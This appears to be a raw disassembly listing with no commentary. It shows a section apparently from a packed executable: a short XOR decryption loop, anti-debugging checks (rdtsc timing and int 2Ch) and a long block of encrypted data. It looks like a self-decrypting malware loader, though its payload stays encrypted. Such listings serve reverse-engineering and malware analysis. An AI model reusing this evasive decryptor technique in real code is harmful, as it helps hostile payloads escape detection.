sub_31431006 proc near ; CODE XREF: UPX2:3143107D�p
push ebx
mov ecx, 0CBFh
mov ebx, edx
loc_3143100E: ; CODE XREF: sub_31431006+13�j
xor [eax], dx
lea edx, [ebx+edx] ; CODE XREF: UPX2:31431082�j
xchg dl, dh
lea eax, [eax+2]
loop loc_3143100E
pop ebx
retn
sub_31431006 endp
; ---------------------------------------------------------------------------
loc_3143101D: ; CODE XREF: UPX2:31431068�j
pop ebp
retn
; ---------------------------------------------------------------------------
db 8
db 8Eh
; =============== S U B R O U T I N E =======================================
sub_31431021 proc near ; CODE XREF: UPX2:loc_31431047�p
; UPX2:3143104D�p
rdtsc
retn
sub_31431021 endp
; ---------------------------------------------------------------------------
loc_31431024: ; CODE XREF: UPX2:31431035�j
; UPX2:3143103F�j ...
mov eax, 1000h
xor ecx, ecx
jmp short loc_31431052
; ---------------------------------------------------------------------------
loc_3143102D: ; CODE XREF: UPX2:31431001�p
test eax, eax
jnz short loc_31431039
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_31431024
jmp short loc_31431047
; ---------------------------------------------------------------------------
loc_31431039: ; CODE XREF: UPX2:3143102F�j
mov dx, cs
shl ebx, 0Ah
js short loc_31431024
jnb short loc_31431024
cmp dh, bh
jz short loc_31431024
loc_31431047: ; CODE XREF: UPX2:31431037�j
call sub_31431021
xchg eax, ecx
call sub_31431021
loc_31431052: ; CODE XREF: UPX2:3143102B�j
neg ecx
push ebp
add eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 8E06h
sub eax, 100h
jnb short loc_3143101D
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-63h]
call sub_31431006
jecxz short near ptr loc_31431011+1
xchg eax, edi
dec esp
mov edx, 3445332Ch
dec edx
mov bh, 0C3h
lodsb
shl ebp, 1
lahf
cmp dl, [edx+7C1DE97Ch]
sbb bh, dh
; ---------------------------------------------------------------------------
dw 0F98Ch
dd 94611F51h, 46A07EBDh, 5F54D441h, 186F4E28h, 0F378BDD8h
dd 956D0223h, 48E67A22h, 2035DBDEh, 23A1CA3h, 0C7962419h
dd 0F6745570h, 7EF8C37h, 0BED89EF0h, 448F3788h, 5A63422Eh
dd 73ED5283h, 7DE6B201h, 0EB6AEADBh, 5ADD5368h, 3846B7B1h
dd 0E80DB20Ah, 0C75BEA6Ah, 8D0A9185h, 51DE0F1Bh, 0DC47C4D4h
dd 21AC4D02h, 0B65F90A9h, 0FE7CB18Ch, 11BBD70Ch, 0A7219F77h
dd 52DB6A35h, 0B205DAB8h, 0C8F310Fh, 2986B8F7h, 0BF0E0404h
dd 94D1713h, 443BADBDh, 0B1554C8Fh, 0BD98261Bh, 0A9F4FA84h
dd 0DA160522h, 0B3C91EA7h, 0E33C313Eh, 0DC65D2ACh, 0E4EDE6Ah
dd 881C315h, 8B972C15h, 63AD1F1Ch, 0D83E3004h, 0E9D84B68h
dd 0C645EC5Bh, 3FB0FA84h, 119B3D0Fh, 0A58C2E79h, 0FFC7096Ch
dd 0E05B27FFh, 0FAAC6572h, 209CCAB5h, 0BC6A909Eh, 0A94A275Eh
dd 0D27B979Bh, 7AA1E46Fh, 0EB466408h, 11847FBCh, 2A930010h
dd 65BAAC53h, 56FF547Ch, 8DF028E4h, 43FB5D50h, 9D9E1CF9h
dd 0AF279973h, 2FA968B6h, 0B390C693h, 79E94B69h, 2D957476h
dd 1E7E88A5h, 59AC1E75h, 68D74BC1h, 0DAD87A7Dh, 0B2EAEF2Dh
dd 1C047680h, 319AB994h, 58BBA29Fh, 4DC199FCh, 0E3B14FDBh
dd 0F4F25461h, 3F990792h, 5ABB639Dh, 1B58A5D1h, 0D9204042h
dd 0EAB9926Ch, 0CD6C7360h, 18A78D8Bh, 39F59DDDh, 0E824ED49h
dd 54CE4325h, 0FEF129E3h, 2FA5C53h, 0D81522D4h, 0ACDE1CA9h
dd 2E2B2E3Ch, 0B253AED2h, 0F0E85E68h, 77FF096h, 89807894h
dd 0B7AB2D00h, 13C5BC00h, 34D74954h, 0F4058FECh, 0E0037182h
dd 2C71CA18h, 0E62ECBF9h, 4DC5362Ch, 0F7CE32DAh, 10F1535Ah
dd 0E86F90Ch, 8E081A63h, 3F5B2502h, 3949BBC8h, 66DF53F4h
dd 1F2CE79Eh, 6D011780h, 188B8AB5h, 7DC642B6h, 7EF482CFh
dd 0E563D5D2h, 80FBE6FCh, 1789E90Fh, 0F96B97A5h, 43F7617Fh
dd 0F300562Eh, 0DA6A5957h, 54EF857h, 26994FA0h, 319A3680h
dd 2FD3BF0Eh, 5DD64A91h, 0D9B56368h, 860274B1h, 1F9A5393h
dd 18AB2BADh, 0B4C40669h, 64D5CDA9h, 77C04B02h, 24EB4584h
dd 5CE38EABh, 0BEBD2431h, 0CF48B8FDh, 4F1FD5D6h, 8B8BE6C3h
dd 2B8FF388h, 0A6A02236h, 8D1F1208h, 5333C14Bh, 0F2E5DBE1h
dd 0F4F86A75h, 26A4B18Bh, 0AD5469A4h, 6B7BA9B5h, 65D1C2E0h
dd 6ED671A7h, 47D1103h, 9BEF029Dh, 0BD221B28h, 0C60F9B0Bh
dd 2D2A5EB7h, 3CEE52EBh, 90143A9h, 2EBEC7ABh, 0B4D260ACh
dd 91443A42h, 859CBD9h, 76EF6088h, 27AA4A89h, 6D908DAAh
dd 0E147235Ah, 4D43C939h, 24B74CBDh, 90241CF1h, 1D111188h
dd 168A86ABh, 0BC291EB4h, 56463D4Ah, 179E2DADh, 0F35C0F89h
dd 148DB208h, 14595A2h, 0EBBD6CB5h, 0B0E325FCh, 0E71EB5CFh
dd 6A7C872Eh, 9812DA13h, 2EC2D6ADh, 0C4547437h, 5AD4463Ah
dd 0A12AB6E0h, 0D60E182Ch, 362F9DEBh, 31749E9Ah, 0CBAA7484h
dd 5558CA88h, 0FFEE0AB8h, 60809CCEh, 0F218E698h, 0B5D82244h
dd 0A646B89Ah, 9DB61F5Ah, 45E71BA0h, 0D1084AACh, 2B619545h
dd 0BA359B36h, 507FB148h, 5F60E2CEh, 7CF66FD5h, 0B77F1181h
dd 0B8227921h, 0BB352A06h, 0D47ED4CAh, 0FF69B69Dh, 4BF5C6h
dd 0E7847CDCh, 0C4A7290Eh, 0C23DAFACh, 33BC2A1Ch, 9C39AB93h
dd 0E8960715h, 4DF06076h, 0D45EF1C8h, 0B891337Eh, 0ED7DC440h
dd 6268D66Bh, 5983C52Bh, 0F539E1C3h, 0F03ADED2h, 4E4587E9h
dd 5EAE1299h, 0A1738979h, 0E7D3F2D3h, 32755D1Ah, 0EA33A5B1h
dd 2DAC7F22h, 970FB6A8h, 179C111Ah, 11EE9A6Ch, 0B6B46CC9h
dd 0B6B7191Fh, 851BE90Fh, 96B40331h, 0CF534262h, 85CB028Dh
dd 2A30E874h, 0AB3B9D93h, 0A8D3294Fh, 0DD4DE070h, 82D5D67Bh
dd 31040512h, 94251249h, 0D340666Ah, 0DC65ED55h, 0D768AB59h
dd 8B1D81Dh, 6140DD96h, 4879AB9h, 0BE8330C2h, 9E5A0D04h
dd 98193EAh, 0E60D53F0h, 0DDB1671Ah, 881BDE25h, 3A07BC46h
dd 5B55C00h, 49F36576h, 206A6AC1h, 8D0214A7h, 14C02704h
dd 0C2877C4Bh, 3CB15360h, 0AE26BFA6h, 1F22CDCh, 2A933F13h
dd 0B4606B3Dh, 72BBBE41h, 0F1E058ECh, 6AFB5D51h, 0E66EFE7Dh
dd 0AEB266F4h, 0AEBD1F17h, 0F397444Bh, 26E95B68h, 2D816400h
dd 8E988A5h, 339C342Ah, 36B85828h, 5FD84AA8h, 0C634E0EDh
dd 0DA55274Ah, 219B6448h, 73BBA2ABh, 41AC6814h, 200E0A50h
dd 2D840127h, 0F0681207h, 30936F62h, 3B84337Fh, 811BED9Bh
dd 4DE5C7A0h, 39F5E8C5h, 6C87BDABh, 29FA4C79h, 0BF38B434h
dd 55CE50C3h, 0EB64D6E2h, 81FA6C79h, 18900210h, 5175CEF7h
dd 749623A9h, 760B6FD2h, 8B9D9AECh, 5ABC1E1Ch, 0F966E6D6h
dd 57C67C64h, 0A223FCA4h, 2DA32A33h, 97088CB0h, 0F86A23F6h
dd 4C997E6Ch, 0D55DD5DDh, 20C54325h, 8E29B9A9h, 3BF10D15h
dd 7AE69C74h, 0C874C9F9h, 79B36457h, 0A428DEBAh, 0AB6173Bh
dd 8C14AA91h, 0F56514FAh, 5AE21361h, 0DB43C8D3h, 37A24D1Ch
dd 0AB10A687h, 0E58B2878h, 45EA756Eh, 0D94AFAC0h, 31D3795Eh
dd 0D935A2B4h, 0E822B24h, 6D2A8A89h, 0FF75E3E1h, 54D85F29h
dd 9325C6DEh, 35BA273Ah, 0C01CB28Eh, 0E86C27B3h, 70F07967h
dd 0CD6BA0D9h, 2390422Ah, 853BA9ABh, 395256Fh, 68EA9143h
dd 0D168FADAh, 4DC74658h, 0CF09C9A2h, 23AA351Ah, 0A8118A9Ah
dd 916F06E0h, 61D47758h, 0E953C4DCh, 53A95322h, 0A416B1A6h
dd 138D0E18h, 7AE7466Bh, 0C145D8C1h, 5BA6D5Fh, 0B71DB6B5h
dd 0B8A2D02h, 60138FB4h, 9A52E0FEh, 63DD7E6Fh, 0A34BC2C7h
dd 2EBC0339h, 9D1FBE8Fh, 88400AF2h, 4AE36C51h, 0F25DF2C9h
dd 4A6592Bh, 0A13CA6B9h, 28A266Eh, 7CE89250h, 0CA6FECCAh
dd 5DF62371h, 0BC22EFB2h, 0AB2262Fh, 8E16A2F2h, 0E37B1EDEh
dd 63F17E77h, 0FB35E6CCh, 3D9D492Fh, 8D0CA68Ch, 1191073Fh
dd 60EC927Eh, 0EB4DFACBh, 2FD56C38h, 9723A0ACh, 0F8A3B08h
dd 6313A1FAh, 0FA7BC8F4h, 57DA7B54h, 0A573B0FDh, 3FBD1022h
dd 0B60C939Fh, 86651E17h, 72F3785Bh, 0D740F7ECh, 38B2550Dh
dd 9F3FA4BFh, 119E2F6Ch, 65F6A66Ch, 0D369E9FBh, 59C2722Eh
dd 0BF35DDA7h, 0B9A7C69h, 0F8069782h, 0ED6708D6h, 17ED6379h
dd 0C251E880h, 35983C3Ch, 8F26B6BFh, 2FF60D18h, 7BCA8A6Fh
dd 0DC63F1CCh, 5CD15842h, 0A72BB4B9h, 0FB75623h, 6C12AA8Ch
dd 0FF7ED3EBh, 5EC26D4Ah, 0B658FCBAh, 3DBF2C16h, 8B04B2B2h
dd 0E193227Ch, 4E957776h, 0C14AF0C7h, 30A45A69h, 0B411AF9Ah
dd 25ED3A07h, 7CF78768h, 0F358E7F6h, 35CC4E41h, 0BF2CC594h
dd 0DB20B3Ch, 833FE38Ah, 0F86D1DC4h, 51CD7B68h, 0D55AD3D8h
dd 3CAC5C22h, 8034BE89h, 0FBB671Dh, 70EE8F4Ah, 0CE67F6EBh
dd 73B74C59h, 0B63FFCBFh, 39862100h, 9A1A8485h, 0DB0FF2FEh
dd 4ED75457h, 915ED9D8h, 32B22C3Dh, 9522AA96h, 0C089217Bh
dd 6EF26060h, 0D34CC8CDh, 28D0584Ah, 912189D4h, 1BBD2D0Bh
dd 6ECE8465h, 0EA74ECC5h, 34C37045h, 0BA0CC18Ch, 99F253Dh
dd 0B86F8482h, 0E97538F0h, 4DE95D74h, 0CB42C6D3h, 2BAC5612h
dd 9013CFB2h, 1496153Dh, 64EA9E5Bh, 0A671FEF7h, 4EE5537Ah
dd 0B12EC9A5h, 1A880514h, 92169C82h, 0FB601AC1h, 64A36C50h
dd 0A54CFACCh, 2F9C383Ch, 8100A397h, 0ED9D0333h, 6DF06E63h
dd 0AF49F6CEh, 37EA5B73h, 8D36B1BAh, 49D2900h, 62CD9D9Eh
dd 0E464E7F8h, 5FD84C2Bh, 0AA2BDA94h, 0CBD2E38h, 9B079299h
dd 0CA6B22E4h, 72F37F77h
dd 0D959D0DBh, 1E913822h, 82289D9Ah, 9871003h, 60E49907h
dd 0CA6DF5EEh, 4FD14D50h, 0BF25DFC9h, 13833731h, 89138FF5h
dd 0E77F11E3h, 48CC6D43h, 0CD38CFDAh, 55B82328h, 8F0AB390h
dd 0E2951F79h, 18E4677Bh, 0CB52F6EFh, 30D9404Eh, 0A93DA891h
dd 1E89120Dh, 61A9C9Ah, 0F961E9DDh, 46CE7358h, 8B35D687h
dd 3BB92739h, 9008AB8Fh, 0FE6201D1h, 4ED00B7Dh, 0D85DC4DAh
dd 3C8A4321h, 0E21AA3BFh, 1D850D39h, 7AE29774h, 0CA78FFD3h
dd 7BDF5767h, 0A427F2C8h, 3B1233Bh, 9D10B580h, 0FE623BEEh
dd 6CE01345h, 0F767E8E0h, 10E30D7Fh, 0B86399AEh, 0ECBA0C1Dh
dd 5CEA7260h, 0FF25EEC0h, 33F44A5Eh, 0BC1AADB4h, 2E9F1C1Eh
dd 621BBDFDh, 0E971F3C2h, 5DCB4A50h, 0BF05D7CAh, 38844814h
dd 87098D8Ch, 0FC6E15D7h, 5EE04F72h, 0B0C723ADh, 2395FE68h
dd 95ACCD9h, 74D42EE2h, 8ECF86Fh, 0C94FDECAh, 697EAF34h
dd 9B186E4Ch, 378F1037h, 36E119A0h, 120A4CA3h, 0B25F1EDBh
dd 0BD068260h, 90C4FAC8h, 40E759B6h, 4CF85A62h, 16E450F1h
dd 39DB98CEh, 428A0643h, 5C5F0255h, 6EE658F6h, 5AFE86ACh
dd 4E988592h, 0FC221B42h, 0C657F1D4h, 36D55754h, 0F2018FE8h
dd 885FF0E8h, 4F976316h, 21D2CFFFh, 4AF31FFFh, 75A69287h
dd 76DF4B6Fh, 50F10881h, 0B79B0011h, 34522300h, 0DE472C4Bh
dd 0B5DE4F6Ch, 288CB6A5h, 0BAA4FE03h, 0A912112Eh, 0BC35BED8h
dd 0AD3469A2h, 29E4581Fh, 0F3F7595Ch, 14944683h, 55607DA2h
dd 0C532D4C7h, 0D67FEB7Fh, 7525D8E9h, 3094EDFAh, 13ED7B6Fh
dd 1E82AFA3h, 0B0FE35BCh, 975BCB59h, 186ADCF1h, 79FF8D63h
dd 0DFC9CF9Fh, 0B22C76FFh, 0C99F3440h, 0EE42B83Bh, 0F927536Ch
dd 3AA43A87h, 0F14EDD98h, 67E1727Fh, 0E6732D3Bh, 665B4E6Ah
dd 0F9E71BD4h, 0D3084AACh, 719E14DEh, 0BA34A65Ah, 0BD4B6148h
dd 0E650C87Fh, 0E97B971Eh, 12BCE466h, 88EFC6F0h, 3E922A12h
dd 0B242044Fh, 7056D3A5h, 20B6ECC8h, 8CA50649h, 2C831914h
dd 160AF90h, 59B9443Ah, 9D96E819h, 1EA8E78h, 736573D3h
dd 0B12B9DA2h, 449AE3B4h, 68DAF585h, 73DD45BBh, 88F4F8Ah
dd 15928B97h, 35AF2025h, 6E4FC0h, 9210C639h, 0F2058249h
dd 66F29BC2h, 2C5A8CD9h, 0EAE72EE6h, 1B99F7CCh, 0B70E91B7h
dd 0EE0A9819h, 11BBD7C4h, 2C2D571Ch, 0D9D14A0h, 509A94CBh
dd 6E24528Bh, 0FF91EB9Dh, 560CD604h, 82824Ah, 453EAD89h
dd 97E24B47h, 647D69A7h, 0B3D648EEh, 9771F212h, 4E83FAEAh
dd 855E44F7h, 0DC552F81h, 0F3B65D6Ah, 389A91EDh, 0B58A0296h
dd 0B7AD2F07h, 0CA4B91BEh, 6060CF57h, 1AEEE1EEh, 8C05758Ch
dd 239F654Eh, 2DCEA3B0h, 4EF7131Bh, 60D03357h, 7AF26156h
dd 10E3AB08h, 0A61F9576h, 68E77134h, 47B4EACAh, 68D17939h
dd 69FA20C5h, 940D7E88h, 28C94473h, 0A838C1E9h, 16CF414Eh
dd 0C9F028B6h, 14FB5D50h, 42E5F594h, 0AB4FCDF7h, 12BD2F3Ch
dd 0FB77712Ch, 8EE95B6Bh, 37ABF86Ah, 5D93D195h, 274F085Fh
dd 0A3963F91h, 8891857h, 50FB1FBBh, 0D20446A9h, 0F1EFCC9Ch
dd 0B6A55DF9h, 0C0C6086Fh, 0B40E8A8Ch, 0F4AA201Bh, 0F89FE90h
dd 652D3B9Dh, 0C8ED3659h, 811AEC62h, 37B0020Fh, 0D0E317A7h
dd 120C4EA1h, 29A01CE5h, 9B4C55B7h, 0AC5BBF45h, 0B864E6C9h
dd 0AB03F986h, 0DACD0220h, 90A698A2h, 2BD5B36h, 0CF2E4959h
dd 690B5A58h, 167F6573h, 4D1687A4h, 0B679E27Ch, 37C9BC00h
dd 51D74956h, 0F46D2F68h, 0B03DF582h, 0A0DF1B6Dh, 3220A190h
dd 4CC537A5h, 977BF35Ah, 46702581h, 49C9B056h, 6B96ADE9h
dd 75B263F4h, 0BA1875E3h, 3589005Eh, 0D684720Bh, 0A9527DBAh
dd 97241CE1h, 5737A9B6h, 54CD3FFDh, 0B833EB63h, 5F63D31h
dd 178F01AAh, 12D5126h, 0C7B42007h, 0D951C348h, 9C92795Bh
dd 0A44D351h, 9B140A16h, 11A7B129h, 0FA60929Fh, 29B32F74h
dd 0CFC0A19Eh, 87E01A1h, 77B8F569h, 0C45BD4D9h, 3BC748C2h
dd 9475E3E3h, 88B7A407h, 0B7B7F705h, 0A31CA98Bh, 0C6E0C6C6h
dd 0FF622352h, 351E635Dh, 1324B6A3h, 910A7C80h, 49D77D5Bh
dd 0D957C7D9h, 5259C14Bh, 6C62E4CAh, 4CCE1EB7h, 3D0B89C7h
dd 0FD24A68Fh, 42B92C52h, 8E019354h, 6B73A736h, 897DDED7h
dd 0AA08D907h, 0F99A4B28h, 946FE0EAh, 0C92A1605h, 0F25BF7DFh
dd 77257707h, 2EBD0883h, 34EE67ACh, 7AD65ACFh, 23A0CAD8h
dd 72CB3DE5h, 0C85F7ECh, 4F9AD09Ah, 38813E59h, 0E034044Dh
dd 0D1564F6Ch, 0FA43CB89h, 1D82808Bh, 26AF3F69h, 39BE0247h
dd 52FB1339h, 0C60E466Bh, 0FBF46946h, 14BDD16Bh, 224B972Bh
dd 0BFB92B2Bh, 0E665585Bh, 302CBC64h, 6B0A88BEh, 0C84EE1F3h
dd 47DB634Eh, 8952D1DFh, 28BB2B37h, 2259DC91h, 7052BDF5h
dd 0FD155ACDh, 0B16CF4A9h, 229063B9h, 79ED47CEh, 0CDEE5071h
dd 0A84F615h, 5E578815h, 504FDDD1h, 8142356Fh, 62DC4E5Ah
dd 0BFFF4F96h, 6A3AD182h, 0C63576B0h, 0D9A12B49h, 4CA0C66h
dd 1932D4B4h, 4CDCA1E1h, 36F8750Ah, 0B0E617A8h, 0BBB7EAB3h
dd 0D44EC169h, 4A8C5608h, 567BECF9h, 3EE88E4h, 2C9733F5h
dd 4931F131h, 0C55A551Eh, 0EE59F581h, 0AA94FCF5h, 0F8140723h
dd 0BED46DA9h, 47AB606Eh, 68A8CFBFh, 73DD7108h, 23F660FEh
dd 60498BA7h, 5814298h, 0CAD048C3h, 39DB7D73h, 0F8E2236Ah
dd 8D062D01h, 181C691Bh, 0B547FFFCh, 0D25CC414h, 0C5FE1F7h
dd 7BF56632h, 11434384h, 102E939Fh, 493A377Bh, 0D725A0FAh
dd 3EE35560h, 0D52C7E08h, 0C25981BDh, 1B882DCh, 82B0AD89h
dd 0DC124073h, 3E64A1B5h, 8DD1DF0h, 2E1E1D58h, 0B384CA9Bh
dd 47C7B0FDh, 0AE3094B1h, 8009581Eh, 212C1859h, 0EC9CAD9Ah
dd 0C7AE4608h, 0C55FE749h, 63974FEFh, 745B6A3Dh, 0C28E8487h
dd 4D2E8412h, 3331939Eh, 29720270h, 965DFFF2h, 1D464EF1h
dd 2B89CB26h, 9631FA2Bh, 4D362834h, 0E1B44235h, 1B54DAA0h
dd 7777D9D8h, 0A4230801h, 40F34522h, 0C153FBBBh, 56CF4126h
dd 699A8064h, 82CB7802h, 33B496EEh, 22D89997h, 458D3A45h
dd 0D4AC3D50h, 8E1660EDh, 64057800h, 0F716B8BBh, 65AC742Bh
dd 58D74B91h, 0D4D87A7Dh, 0C5409768h, 89E4B783h, 21F05C49h
dd 9D5D3750h, 0C84F3875h, 0E36CE0A0h, 7998B0FAh, 5FBA0555h
dd 8B7D2562h, 0AE4B2603h, 0D17A9640h, 4983D7D4h, 0F9FFE8C5h
dd 929981AFh, 0A2A2240Bh, 0AB396E4h, 55FE6E36h, 0DF7E8268h
dd 14D192F2h, 18A02C77h, 8051152Dh, 6F112E0Ch, 20B06F10h
dd 6D88DFE5h, 572EF0CEh, 0CD44D7C7h, 189E88D5h, 3711B3F0h
dd 6EFD48C3h, 87481CECh, 0EF395FB8h, 4CFB6A76h, 0F615C5CBh
dd 20A05F37h, 0CC69FEB6h, 549D0F14h, 5D87C82Bh, 0E149DCC5h
dd 4FF0797Fh, 0BE2CC9BAh, 8B0122Ah, 901A9580h, 0CE7F18D9h
dd 5ED37673h, 0CD52CADFh, 35A56C10h, 0AB07B090h, 0F39C081Bh
dd 76DF5D7Ch, 0C848F6D7h, 30C9484Fh, 0AB38858Dh, 3862E02h
dd 6911BF91h, 0C76DE5FAh, 5FCB687Ah, 0A332D3DBh, 3BB93A05h
dd 0AF09B282h, 0E17601C0h, 65F17878h, 0C56FC4C8h, 28AD5A33h
dd 8E33B8B8h, 3BAC1101h, 0DF28B6Ch, 0F75AC1C8h, 7CE06566h
dd 0AC21F79Bh, 0AAD3F2Fh, 0AC289295h, 0FE6E12E0h, 64FC6168h
dd 0D844DAC0h, 369A4A25h, 860BA793h, 7BD3619h, 64E16C7Eh
dd 0F824E4C1h, 27DD5E5Bh, 0AB3F8AA4h, 6EE45812h, 74B3BEFCh
dd 0E86301F6h, 5DC06347h
dd 0AD4BDF90h, 2CB92926h, 9C02F38Bh, 0C6011CE6h, 3EDC4A5Fh
dd 0C649FAC6h, 30B24332h, 0A50A9ED2h, 3C86413Ch, 2CCBBE4Bh
dd 0D072FBBCh, 32825644h, 0CE475193h, 0E5804F5Ch, 0CA53371Fh
dd 0FF8CBD88h, 269F210Bh, 9654324Bh, 0BA0A3D7Ah, 825DA7FFh
dd 6B42E268h, 4D8DCF26h, 0DF0DA90Eh, 7E384D12h, 0F53ADC31h
dd 47C4EAE9h, 74F7EDCAh, 0FEB7D392h, 6C2D9783h, 4B3E8095h
dd 6AFD2ED7h, 0B6E326E8h, 784EFE84h, 0FE97B9EFh, 3F727565h
dd 78D79DC5h, 0DE329AD6h, 0E1116E06h, 0AB4DC7Bh, 0A83EF01Bh
dd 0DEF6572Ah, 0CC46B8CCh, 4C9F0809h, 0F83EA8B4h, 0A459EF79h
dd 0E495102Ch, 0B85EB2C6h, 0A9B7D418h, 739F2D21h, 7CC64279h
dd 10F83E8Fh, 0A3CA445Fh, 6DB82A36h, 9B11838Ah, 26A07831h
dd 9584ECB4h, 9621A9DFh, 0D35E4FCCh, 0C2364745h, 0B864550h
dd 0DC5A89A3h, 0C8B33552h, 6A00F813h, 592BAD83h, 47C13335h
dd 0AF27BAA2h, 15993102h, 0F6D3F540h, 0AF338602h, 2C2AA82Dh
dd 0C44587E9h, 5F56C068h, 7E71D3F6h, 0BD2C5E00h, 0B6625E1Bh
dd 0B9038FC0h, 4FCD53D4h, 50D2D1DDh, 7BC57E38h, 1C367050h
dd 4F21A3B4h, 0C248DA95h, 43C878ADh, 69E36541h, 6DDC68A7h
dd 950FB1ADh, 0BF582AEh, 956BAD89h, 57BB4225h, 0ED65B1B7h
dd 1602EF7Bh, 1AA32E03h, 0C5735B2Dh, 0C532BC1Ch, 8E55F7F4h
dd 0C7665B00h, 8B1D390h, 0CE47DFC2h, 0A1524D7Dh, 0CA739ED7h
dd 6D4CB400h, 306FD1C5h, 0BC285901h, 30730D1Ah, 47CE5C43h
dd 7ED544CBh, 0A8D808DCh, 2CF35567h, 0F8BAA45Ch, 59E06363h
dd 29F9A2F3h, 861DBDFAh, 8609673Fh, 39881604h, 0A4183309h
dd 75DB4322h, 32E6438Ch, 0D308BEB1h, 0EC55C2A8h, 0D68D082Ch
dd 9C1CCA22h, 0AF17B7D8h, 14EC7E6Ch, 8A029483h, 5B80CE96h
dd 927FF1CFh, 9D26A2F4h, 46B3F6EAh, 0C94E5CB5h, 178B4A57h
dd 0A52FB7A1h, 0C74058CAh, 0B4650C55h, 0B70088DEh, 4DC634ADh
dd 0B0149DDBh, 18A41014h, 4EED8F6Bh, 30E1C09Dh, 3B840C3Eh
dd 0FEFF315Ah, 0FE06274h, 0FD76E83Dh, 6C0C14DDh, 198859B4h
dd 1AD27B7h, 0D8CE7052h, 0DB4F215Eh, 0D6A83A79h, 328997EFh
dd 6AA59896h, 9F29A330h, 8A52F4CDh, 26E9303Fh, 67D98ACh
dd 4FEA0794h, 0CD51B0C2h, 0FAFC303Fh, 5ED77943h, 7C05D498h
dd 75037591h, 10B3928Dh, 0B62349AEh, 1F923744h, 0D1108E95h
dd 34B54D42h, 9B78F94Ah, 0A42DA5EDh, 3AB44DA1h, 65C4BBC8h
dd 66EF49FCh, 21C86AADh, 7A0B4DA0h, 0D75EE110h, 0BE37A55Eh
dd 1A84684Ch, 0BE269BABh, 0CCB52F56h, 661AFE0Fh, 2825A78Fh
dd 763F22FBh, 4A51C3D3h, 6FE75C0Fh, 0E5CB62FDh, 0C214B68Bh
dd 1B53A1A4h, 3EA8B28Fh, 0DE29B7A4h, 0C3462356h, 0D0D7481h
dd 1F980807h, 0B4BE4C2Ch, 23903643h, 0E15ACDD8h, 5D2DF790h
dd 0C907F835h, 0A31C8F0Bh, 5366AF61h, 5AB7E8C7h, 65EE7AA0h
dd 8E2D2676h, 82821484h, 0B25F121Fh, 0BD06822Ch, 0EE4FDCA0h
dd 0E952F473h, 0F2D11F77h, 26AE968Bh, 39DBC6A4h, 428A06D3h
dd 5C5F0255h, 6EE659EFh, 8F71AE77h, 15237A92h, 8989ADh
dd 0E8BA77BEh, 5DD57779h, 0F301DD80h, 1DFE71EAh, 1EA723E3h
dd 0BBD2672Fh, 4AC255C6h, 75D458D8h, 76DF41E0h, 5FD7E76Eh
dd 88FE1865h, 0F8342300h, 0CF073CC9h, 0D9504F5Ch, 0FA43C542h
dd 91E17339h, 4E60EEE9h, 0BC35A720h, 0DB2D1614h, 1735F7D4h
dd 4EDD0CE3h, 0AA30720Ch, 1B23A582h, 0B65BC339h, 43C23E31h
dd 6CD577CFh, 1614ED90h, 0CA128490h, 0DF3DE575h, 493E8096h
dd 0D7C06216h, 0C044A37Dh, 300F227Eh, 38D2831Eh, 0BACC5FBEh
dd 5AC37E42h, 944AC89Ch, 50AA6B6Fh, 565760Ah, 0F1126C59h
dd 26946625h, 41168A3Bh, 52F761E7h, 0F86E0CF0h, 0A02D7A86h
dd 0ABE682Ah, 80148892h, 7EEF196Dh, 9E45AAE6h, 76854D54h
dd 5CC5B140h, 57759480h, 0E9233A3h, 788A41CCh, 0E45662h
dd 532CBCF8h, 0BCE01671h, 0A12C1914h, 0C20DBA88h, 4330453Ah
dd 0BF64128Dh, 84FF7494h, 7FB02113h, 4E7C9DA3h, 77EB2AAAh
dd 0D1934AD5h, 1BE6B43Bh, 983F509h, 0BFDD361Ah, 66F8211Dh
dd 0E1B4223Ch, 0A15E4D69h, 42FCB791h, 8D3752AAh, 36AFAA98h
dd 3433A581h, 7FE415CAh, 8F91FADDh, 28A33673h, 3B6668F6h
dd 5FA293AFh, 0AC985735h, 66C04140h, 69D37E4Eh, 518BE647h
dd 7D6F91F8h, 0D45AE1C9h, 222CDFD8h, 56A6CE46h, 22EC330Eh
dd 3E70A150h, 1AA32E3Dh, 47AE3F5Bh, 0B9EC88D5h, 0EC7F2641h
dd 1D56DD6Ah, 981C315h, 0AE7FA3E2h, 0CBAD1F59h, 0FA692C57h
dd 4E64CB58h, 0F66FD1C3h, 9C266F0h, 22AB2D88h, 0B831A3B0h
dd 63E9BC80h, 0D5DCFECh, 850C9B7Ah, 108D3955h, 8B302413h
dd 0C3E32704h, 0E261FC5Fh, 9719D060h, 0FECC6DF9h, 11847F8Ch
dd 2A933B11h, 3F6FABD2h, 66E5CCDBh, 0E3A552E4h, 82FBC9FEh
dd 49512811h, 0FF24F3F7h, 45D52E57h, 8D93C5D3h, 5BCCCE96h
dd 0FF03F1CFh, 9792876Ah, 0BAAC1E28h, 0F96C8344h, 6455C757h
dd 786ED0C3h, 0BB2A3516h, 4BC85D19h, 22CFF2AFh, 4DF6120Ch
dd 0ECA33658h, 79F0BCF5h, 0F0889007h, 9530A728h, 7E21D933h
dd 524A8CE3h, 0E3EFADA7h, 0FD76EA34h, 0BD47FB02h, 0E0911411h
dd 0EF6969B4h, 4CA2A1Ch, 0C553631Ch, 14056C49h, 18A02839h
dd 2A295823h, 44BC2CA1h, 5FDB0DE1h, 70D87427h, 6E2EA1AFh
dd 9C1A878Bh, 473EE27Ah, 4D4183EAh, 8534696h, 7D6DDFEEh
dd 0BA2D2607h, 6B12C818h, 0E8AD1996h, 9EF63744h, 13AC0CD9h
dd 0FD788287h, 0EB7D759h, 1C21C417h, 3AB33F32h, 114A69FBh
dd 8728A0A9h, 0D222627Dh, 9DC87DBAh, 0D1A75897h, 0EDBA9F55h
dd 177A3054h, 0A3B3D6F6h, 83D1AA13h, 48B580DFh, 544BFED2h
dd 0C0F2334Fh, 0AB50CFABh, 53ACD2B8h, 66AAD76h, 0DF9996D1h
dd 0E85DE361h, 427B739Ch, 5DE6661Eh, 0B7E78728h, 18B78A5h
dd 1F980AAFh, 3EED609Eh, 0C6CFDD8Ch, 0D177E364h, 0A87B9E6Fh
dd 312A3136h, 9F1AFCFAh, 15B0534Bh, 937410E7h, 4BE2BC29h
dd 0FB483B87h, 59E994FCh, 629D1394h, 0C936EDEDh, 109F0340h
dd 6C6DD4B3h, 8007953Eh, 41B30385h, 0A367D8EDh, 0BD4510BEh
